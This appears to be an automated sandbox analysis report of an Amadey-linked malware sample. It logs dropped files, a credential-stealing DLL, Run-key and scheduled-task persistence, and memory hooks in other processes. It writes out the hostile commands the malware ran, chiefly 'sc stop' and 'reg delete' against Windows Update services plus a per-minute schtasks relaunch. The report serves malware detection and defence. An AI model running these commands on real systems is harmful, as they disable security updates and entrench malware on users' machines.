Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\ProgramData\61312899942613011832.exe

File created: C:\Users\user\AppData\Local\Temp\03bd543fce

Jump to behavior

Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3076:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\118b2709b7d16171ccdcf59ab82ccd18
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Mutant created: \Sessions\1\BaseNamedObjects\c33e9ad058e5d380869687d885c0668c

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe, type: DROPPED

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: DQxttu2Qrr.exe

Static file information: File size 7387352 > 1048576

Source: DQxttu2Qrr.exe

Static PE information: Raw size of .rrt02 is bigger than: 0x100000 < 0x704c00

Source: DQxttu2Qrr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Carafej mamib cemike\xiwati\Dedexaj wahiraje\jeweyohe kajexef.pdb source: umciavi64.exe, 00000031.00000002.647446249.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp, umciavi64.exe, 00000031.00000000.425031565.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Code function: 26_3_000001830AEE3027 push es; ret

26_3_000001830AEE3152

PE file contains sections with non-standard names

Source: DQxttu2Qrr.exe	Static PE information: section name: .rrt00
Source: DQxttu2Qrr.exe	Static PE information: section name: .rrt01
Source: DQxttu2Qrr.exe	Static PE information: section name: .rrt02
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: lB@dO\ih
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: Fh?jG[OJ
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: qNR5:WbS
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: z?fd8ijJ
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: CV?7x>JO
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: EVjKc_MI
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: dT<:EHzj
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: @]topACL
Source: nppshell[1].exe.0.dr	Static PE information: section name: lB@dO\ih
Source: nppshell[1].exe.0.dr	Static PE information: section name: Fh?jG[OJ
Source: nppshell[1].exe.0.dr	Static PE information: section name: qNR5:WbS
Source: nppshell[1].exe.0.dr	Static PE information: section name: z?fd8ijJ
Source: nppshell[1].exe.0.dr	Static PE information: section name: CV?7x>JO
Source: nppshell[1].exe.0.dr	Static PE information: section name: EVjKc_MI
Source: nppshell[1].exe.0.dr	Static PE information: section name: dT<:EHzj
Source: nppshell[1].exe.0.dr	Static PE information: section name: @]topACL
Source: gntuud.exe.4.dr	Static PE information: section name: lB@dO\ih
Source: gntuud.exe.4.dr	Static PE information: section name: Fh?jG[OJ
Source: gntuud.exe.4.dr	Static PE information: section name: qNR5:WbS
Source: gntuud.exe.4.dr	Static PE information: section name: z?fd8ijJ
Source: gntuud.exe.4.dr	Static PE information: section name: CV?7x>JO
Source: gntuud.exe.4.dr	Static PE information: section name: EVjKc_MI
Source: gntuud.exe.4.dr	Static PE information: section name: dT<:EHzj
Source: gntuud.exe.4.dr	Static PE information: section name: @]topACL
Source: syncfiles[1].dll.13.dr	Static PE information: section name: *;>%1sXO
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 7rP!Ni:j
Source: syncfiles[1].dll.13.dr	Static PE information: section name: bkE<E2?8
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 8*7`Joyq
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 0Ys'"rSd
Source: syncfiles[1].dll.13.dr	Static PE information: section name: nUPwRZiK
Source: syncfiles[1].dll.13.dr	Static PE information: section name: $u!6XeN&
Source: syncfiles[1].dll.13.dr	Static PE information: section name: K)'tLNvc
Source: syncfiles.dll.13.dr	Static PE information: section name: *;>%1sXO
Source: syncfiles.dll.13.dr	Static PE information: section name: 7rP!Ni:j
Source: syncfiles.dll.13.dr	Static PE information: section name: bkE<E2?8
Source: syncfiles.dll.13.dr	Static PE information: section name: 8*7`Joyq
Source: syncfiles.dll.13.dr	Static PE information: section name: 0Ys'"rSd
Source: syncfiles.dll.13.dr	Static PE information: section name: nUPwRZiK
Source: syncfiles.dll.13.dr	Static PE information: section name: $u!6XeN&
Source: syncfiles.dll.13.dr	Static PE information: section name: K)'tLNvc
Source: cred64[1].dll.13.dr	Static PE information: section name: f5g\gWe7
Source: cred64[1].dll.13.dr	Static PE information: section name: zDthL)*@
Source: cred64[1].dll.13.dr	Static PE information: section name: nb"h!m#Y
Source: cred64[1].dll.13.dr	Static PE information: section name: $^+<%+dU
Source: cred64[1].dll.13.dr	Static PE information: section name: Z-),j99t
Source: cred64[1].dll.13.dr	Static PE information: section name: 8"ikKHD[
Source: cred64[1].dll.13.dr	Static PE information: section name: k&l<0?<6
Source: cred64[1].dll.13.dr	Static PE information: section name: n[uZh3ex
Source: cred64[1].dll.13.dr	Static PE information: section name: Uh%r6i!H
Source: cred64.dll.13.dr	Static PE information: section name: f5g\gWe7
Source: cred64.dll.13.dr	Static PE information: section name: zDthL)*@
Source: cred64.dll.13.dr	Static PE information: section name: nb"h!m#Y
Source: cred64.dll.13.dr	Static PE information: section name: $^+<%+dU
Source: cred64.dll.13.dr	Static PE information: section name: Z-),j99t
Source: cred64.dll.13.dr	Static PE information: section name: 8"ikKHD[
Source: cred64.dll.13.dr	Static PE information: section name: k&l<0?<6
Source: cred64.dll.13.dr	Static PE information: section name: n[uZh3ex
Source: cred64.dll.13.dr	Static PE information: section name: Uh%r6i!H
Source: Emit64[1].exe.13.dr	Static PE information: section name: 87*qGv;7
Source: Emit64[1].exe.13.dr	Static PE information: section name: ^NsFAbb[
Source: Emit64[1].exe.13.dr	Static PE information: section name: 4.ps1S["
Source: Emit64[1].exe.13.dr	Static PE information: section name: l^D/X#s1
Source: Emit64[1].exe.13.dr	Static PE information: section name: aAyXB94]
Source: Emit64[1].exe.13.dr	Static PE information: section name: n9Mms2uS
Source: Emit64[1].exe.13.dr	Static PE information: section name: 7u=]29J1
Source: Emit64[1].exe.13.dr	Static PE information: section name: *<5LK<h`
Source: Emit64[1].exe.13.dr	Static PE information: section name: Ug$Va';z
Source: Emit64[1].exe.13.dr	Static PE information: section name: dA:<*dF(
Source: Emit64[1].exe.13.dr	Static PE information: section name: r,Ht]nHV
Source: Emit64[1].exe.13.dr	Static PE information: section name: m$m2M1,9
Source: Emit64[1].exe.13.dr	Static PE information: section name: o?%]P5Wl
Source: Emit64[1].exe.13.dr	Static PE information: section name: lNMkoK?T
Source: Emit64.exe.13.dr	Static PE information: section name: 87*qGv;7
Source: Emit64.exe.13.dr	Static PE information: section name: ^NsFAbb[
Source: Emit64.exe.13.dr	Static PE information: section name: 4.ps1S["
Source: Emit64.exe.13.dr	Static PE information: section name: l^D/X#s1
Source: Emit64.exe.13.dr	Static PE information: section name: aAyXB94]
Source: Emit64.exe.13.dr	Static PE information: section name: n9Mms2uS
Source: Emit64.exe.13.dr	Static PE information: section name: 7u=]29J1
Source: Emit64.exe.13.dr	Static PE information: section name: *<5LK<h`
Source: Emit64.exe.13.dr	Static PE information: section name: Ug$Va';z
Source: Emit64.exe.13.dr	Static PE information: section name: dA:<*dF(
Source: Emit64.exe.13.dr	Static PE information: section name: r,Ht]nHV
Source: Emit64.exe.13.dr	Static PE information: section name: m$m2M1,9
Source: Emit64.exe.13.dr	Static PE information: section name: o?%]P5Wl
Source: Emit64.exe.13.dr	Static PE information: section name: lNMkoK?T
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .n3DK0
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .symtab
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .n3DK1
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .n3DK2
Source: avicapn32[1].exe.13.dr	Static PE information: section name: .n3DK3
Source: avicapn32.exe.13.dr	Static PE information: section name: .n3DK0
Source: avicapn32.exe.13.dr	Static PE information: section name: .symtab
Source: avicapn32.exe.13.dr	Static PE information: section name: .n3DK1
Source: avicapn32.exe.13.dr	Static PE information: section name: .n3DK2
Source: avicapn32.exe.13.dr	Static PE information: section name: .n3DK3
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 87*qGv;7
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: ^NsFAbb[
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 4.ps1S["
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: l^D/X#s1
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: aAyXB94]
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: n9Mms2uS
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 7u=]29J1
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: *<5LK<h`
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: Ug$Va';z
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: dA:<*dF(
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: r,Ht]nHV
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: m$m2M1,9
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: o?%]P5Wl
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: lNMkoK?T

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .rrt02

PE file contains an invalid checksum

Source: umciavi32.exe.13.dr	Static PE information: real checksum: 0x2f4f7 should be: 0x1a069f
Source: umciavi32[1].exe.13.dr	Static PE information: real checksum: 0x2f4f7 should be: 0x1a069f
Source: jekppnay.tmp.26.dr	Static PE information: real checksum: 0x0 should be: 0x2ec3f
Source: advapi32.dll.49.dr	Static PE information: real checksum: 0x0 should be: 0x4a7fc

Source: initial sample	Static PE information: section name: .text entropy: 7.996278983729512
Source: initial sample	Static PE information: section name: .text entropy: 7.996278983729512

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

File created: C:\ProgramData\61312899942613011832.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\nppshell[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	File created: C:\Users\user\Locktime\RtkAudUService64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	File created: C:\Users\user\AppData\Local\Temp\jekppnay.tmp	Jump to dropped file
Source: C:\ProgramData\61312899942613011832.exe	File created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\1000018002\avicapn32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	File created: C:\Users\user\AppData\Local\Temp\advapi32.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\avicapn32[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\1000019012\syncfiles.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File created: C:\ProgramData\61312899942613011832.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run syncfiles.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run umciavi32.exe	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Memory written: PID: 2508 base: 680005 value: E9 FB 99 26 77	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Memory written: PID: 2508 base: 778E9A00 value: E9 0A 66 D9 88	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Memory written: PID: 2508 base: 690007 value: E9 7B 4C 29 77	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Memory written: PID: 2508 base: 77924C80 value: E9 8E B3 D6 88	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Memory written: PID: 5372 base: 660005 value: E9 FB 99 28 77	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Memory written: PID: 5372 base: 778E9A00 value: E9 0A 66 D7 88	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Memory written: PID: 5372 base: 670007 value: E9 7B 4C 2B 77	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Memory written: PID: 5372 base: 77924C80 value: E9 8E B3 D4 88	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 5780 base: 15D0005 value: E9 FB 99 31 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 5780 base: 778E9A00 value: E9 0A 66 CE 89	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 5780 base: 15E0007 value: E9 7B 4C 34 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 5780 base: 77924C80 value: E9 8E B3 CB 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: DB0005 value: E9 FB 99 B3 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 778E9A00 value: E9 0A 66 4C 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: DC0007 value: E9 7B 4C B6 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 77924C80 value: E9 8E B3 49 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: F70005 value: E9 FB BF 94 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 778BC000 value: E9 0A 40 6B 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: FA0008 value: E9 AB E0 95 76	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 778FE0B0 value: E9 60 1F 6A 89	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: FB0005 value: E9 CB 5A 95 73	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 74905AD0 value: E9 3A A5 6A 8C	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: FC0005 value: E9 5B B0 96 73	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 7492B060 value: E9 AA 4F 69 8C	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 1210005 value: E9 DB F8 A9 75	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 76CAF8E0 value: E9 2A 07 56 8A	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 1220005 value: E9 FB 42 AB 75	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 76CD4300 value: E9 0A BD 54 8A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 4948 base: 1340005 value: E9 FB 99 5A 76
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 4948 base: 778E9A00 value: E9 0A 66 A5 89
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 4948 base: 1350007 value: E9 7B 4C 5D 76
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 4948 base: 77924C80 value: E9 8E B3 A2 89
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: PID: 3920 base: 7FFC32240008 value: E9 7B A9 EA FF
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: PID: 3920 base: 7FFC320EA980 value: E9 90 56 15 00
